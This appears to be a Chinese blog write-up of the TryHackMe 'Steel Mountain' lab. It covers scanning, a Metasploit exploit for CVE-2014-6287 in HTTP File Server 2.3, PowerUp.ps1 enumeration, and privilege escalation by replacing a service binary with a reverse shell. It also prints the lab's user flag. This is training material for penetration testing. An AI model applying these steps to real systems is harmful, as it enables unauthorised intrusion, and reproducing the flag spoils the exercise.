关于渗透测试的基本要求

本文详细描述了一次针对Windows系统的攻击过程,涉及端口扫描、Metasploit的CVE-2014-6287漏洞利用、Powershell权限提升以及PowUp.ps1的使用,展示了黑客如何通过社会工程收集信息、对比、攻击和最终提权的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一大堆端口,其中有80、8080、145、139、445、3389....

进入8080的web页面看到是HTTP File Server v2.3
Steel Mountain
在此会议室中,您将枚举Windows计算机,使用Metasploit获得初始访问权限,使用Powershell进一步枚举计算机并将权限升级到管理员。

循例 nmap 扫


searchsploit搜索相关版本的cve

CVE-2014-6287

进入msfconsole:

search CVE-2014-6287
use 0

设置好相关的参数并运行exp,getshell

type C:\Users\bill\Desktop\user.txt
b04763b6fcf51fcd7c13abc7db4fd365
权限提升:

利用PowUp.ps1收集相关信息

meterpreter> upload /PowUp.ps1
             load powershell
             powershell_shell

powershell> . .\PowerUp.ps1
            Invoke-AllChecks
CanRestart 选项为 true,允许我们在系统上重新启动服务,应用程序的目录也是可写的。这意味着我们可以用恶意应用程序替换合法应用程序,重新启动服务,这将运行我们受感染的程序!

上传revserse shell到目标:

meterpreter > upload /home/sugobet/rev_exe.exe

回到cmd:

copy ./rev_exe.exe "C:\....."
sc stop serviceName
sc start serviceName

成功提权

Ncat: Connection from 10.10.16.205.
Ncat: Connection from 10.10.16.205:49277.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.


C:\Windows\system32>whoami
whoami
nt authority\system

关于提权的基本要求就是

1信息收集,主要是社会工程要求

2信息对比,

3进行攻击,

4日志分析。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值